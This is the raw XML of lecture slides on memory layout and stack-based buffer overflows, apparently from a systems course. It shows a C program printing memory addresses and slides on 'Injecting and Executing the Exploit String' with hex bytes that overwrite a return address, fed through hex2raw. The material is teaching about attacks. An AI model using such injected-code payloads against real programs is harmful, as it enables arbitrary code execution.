                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A748E03B-9EEB-B24E-9AC5-DC8E718A0EDF}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="12"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8CADEF-F149-6645-8127-51590E96A62F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="10"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0" name="Rounded Rectangle 29">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3E97B24A-CC8F-BE40-86C1-B53354DAA582}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5384800" y="790907"/>
            <a:ext cx="7632700" cy="644023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long </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>global_variable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = 73;</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print_stack_address</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(const long *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>addr</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new_addr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = 42;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    if (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>addr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>) {</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First called stack frame at %14p\n", </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>addr</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Second called stack frame at %14p\n", &amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>new_addr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else {</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(&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>new_addr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int main() {</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main_var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = 88;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    const char string[] = "Hello, world!";</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first_addr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = NULL;</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Main stack frame at %14p\n", &amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>main_var</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t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>first_addr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="12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long *small = (long *)malloc(16);</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("Small </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>malloc'd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> variable stored at %14p\n", small);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    long *large = (long *)malloc(1 &lt;&lt; 24);</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("Large </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>malloc'd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> variable stored at %14p\n", large);</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Called function stored at %14p\n",</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print_stack_address</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Global variable stored at %14p\n", &amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>global_variable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>("        String constant stored at %14p\n", string);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    return 0;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="26" name="Group 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{52127112-4D33-BF4B-AD64-A5AF9DFA0C5C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3332882" y="790908"/>
            <a:ext cx="5558218" cy="3447413"/>
            <a:chOff x="3332882" y="790908"/>
            <a:chExt cx="5558218" cy="3447413"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="Oval 2">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5FE9928C-94BF-324F-B72F-A237E4366F6F}"/>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8959C91-591F-BA4E-A62F-644737746E52}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="3" idx="2"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1" flipV="1">
              <a:off x="3332882" y="790908"/>
              <a:ext cx="2815018" cy="3220114"/>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34" name="Group 33">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0B4AC9B1-3F9C-C24D-B5F6-180C77687F46}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3346693" y="827653"/>
            <a:ext cx="5413197" cy="1185846"/>
            <a:chOff x="2824346" y="1305817"/>
            <a:chExt cx="5413197" cy="1185846"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="35" name="Oval 34">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3D563C46-2D5A-4849-A0E1-DFD9C9DB3744}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5494343" y="2037065"/>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E7B6E73F-75D3-A841-8F71-5F5244FABCF0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="35" idx="2"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1" flipV="1">
              <a:off x="2824346" y="1305817"/>
              <a:ext cx="2669997" cy="958547"/>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3" name="Group 42">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{54C8E006-CEA6-364D-B0C0-8BE3D8146B83}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3304191" y="2163604"/>
            <a:ext cx="7301409" cy="3220537"/>
            <a:chOff x="1589691" y="1017784"/>
            <a:chExt cx="7301409" cy="3220537"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="44" name="Oval 43">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B634160C-BCA1-1944-886D-63919FFD3802}"/>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20D93950-39FD-7146-BE31-D4402DCEEAD2}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="44" idx="2"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1" flipV="1">
              <a:off x="1589691" y="1017784"/>
              <a:ext cx="4558209" cy="2993238"/>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47" name="Group 46">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{318FA2AB-38C2-C349-BD03-923D15F908FC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3304191" y="4719041"/>
            <a:ext cx="7372602" cy="1081889"/>
            <a:chOff x="1518498" y="3156432"/>
            <a:chExt cx="7372602" cy="1081889"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="48" name="Oval 47">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A9645B2B-C623-624A-8CCC-09D53D8197BD}"/>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C4C6047E-BA60-2341-A4CE-F2B4195EE480}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="48" idx="2"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1" flipV="1">
              <a:off x="1518498" y="3156432"/>
              <a:ext cx="4629402" cy="854590"/>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1" name="Group 50">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{381AEECE-4D6A-A440-B66D-7CEFECAB066C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3346693" y="1267876"/>
            <a:ext cx="5544407" cy="4729545"/>
            <a:chOff x="3346693" y="3783723"/>
            <a:chExt cx="5544407" cy="4729545"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="52" name="Oval 51">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4912D244-02E9-EF48-9E99-8F11C0842FAB}"/>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F977E9A3-AD51-A849-A5E1-D52456ECE1E9}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="52" idx="2"/>
              <a:endCxn id="13" idx="3"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="3346693" y="4011022"/>
              <a:ext cx="2801207" cy="4502246"/>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5" name="Group 54">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6D1B4BD3-9A3E-FB48-851E-FD11238FE46D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3332882" y="823894"/>
            <a:ext cx="5738219" cy="4559824"/>
            <a:chOff x="3152881" y="3783723"/>
            <a:chExt cx="5738219" cy="4559824"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="56" name="Oval 55">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B5014493-EF3D-3347-A22F-6FC1A81A6619}"/>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C2194EB9-1EE9-AF40-B5D4-9A864FFE345C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="56" idx="2"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="3152881" y="4011022"/>
              <a:ext cx="2995019" cy="4332525"/>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59" name="Group 58">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F250842E-22AF-5C4C-A59F-BFE0A2C1E390}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3304191" y="4039129"/>
            <a:ext cx="8039458" cy="1334507"/>
            <a:chOff x="851642" y="3783723"/>
            <a:chExt cx="8039458" cy="1334507"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="60" name="Oval 59">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0AEC4689-B797-8248-BB72-C6C92300F9E8}"/>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9620D574-F0F9-4646-AD1B-7F68CBF613D1}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="60" idx="2"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="851642" y="4011022"/>
              <a:ext cx="5296258" cy="1107208"/>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03584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par>
                                <p:cTn id="13" presetID="9" presetClass="exit" presetSubtype="0" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="dissolve">
                                      <p:cBhvr>
                                        <p:cTn id="14" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="26"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="15" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="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par>
                                <p:cTn id="21" presetID="9" presetClass="exit" presetSubtype="0" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="dissolve">
                                      <p:cBhvr>
                                        <p:cTn id="22" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="34"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="23" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="3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dissolve">
                                      <p:cBhvr>
                                        <p:cTn id="28" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="47"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="29" presetID="9" presetClass="exit" presetSubtype="0" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="dissolve">
                                      <p:cBhvr>
                                        <p:cTn id="30" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="43"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="31" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="4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dissolve">
                                      <p:cBhvr>
                                        <p:cTn id="36" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="51"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="37" presetID="9" presetClass="exit" presetSubtype="0" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="dissolve">
                                      <p:cBhvr>
                                        <p:cTn id="38" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="47"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="39" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="4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dissolve">
                                      <p:cBhvr>
                                        <p:cTn id="44" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="55"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="45" presetID="9" presetClass="exit" presetSubtype="0" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="dissolve">
                                      <p:cBhvr>
                                        <p:cTn id="46" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="51"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="47" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="5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dissolve">
                                      <p:cBhvr>
                                        <p:cTn id="52" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="59"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="53" presetID="9" presetClass="exit" presetSubtype="0" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="dissolve">
                                      <p:cBhvr>
                                        <p:cTn id="54" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="55"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="55"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Injecting and Executing the Exploit String</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2086918" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>back-again-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>string.txt</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Rounded Rectangle 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CB574FB0-8A0F-B94F-B667-A15C12A64D6D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="571498" y="3458542"/>
            <a:ext cx="10782301" cy="158104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./hex2raw &lt; back-again-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>string.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> &gt;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31" name="Rounded Rectangle 130">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7FF90151-E1C1-0A4C-BEB0-A743BFBC30B1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="571499" y="1821677"/>
            <a:ext cx="8300358" cy="118577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68 48 06 40 00 c3 00 00   //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 ret</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F8 DF FF FF FF 7F 00 00   // this return address is on the stack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="12002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3E868C-F994-F445-8AC3-1813DA76A2FF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>How’d That Happen?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32CE0AEB-3D5D-2B4F-8930-6FC610ADD4FA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="571499" y="1821677"/>
            <a:ext cx="8300358" cy="1185770"/>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68 48 06 40 00 c3 00 00   // </a:t>
            </a:r>
            <a:r>
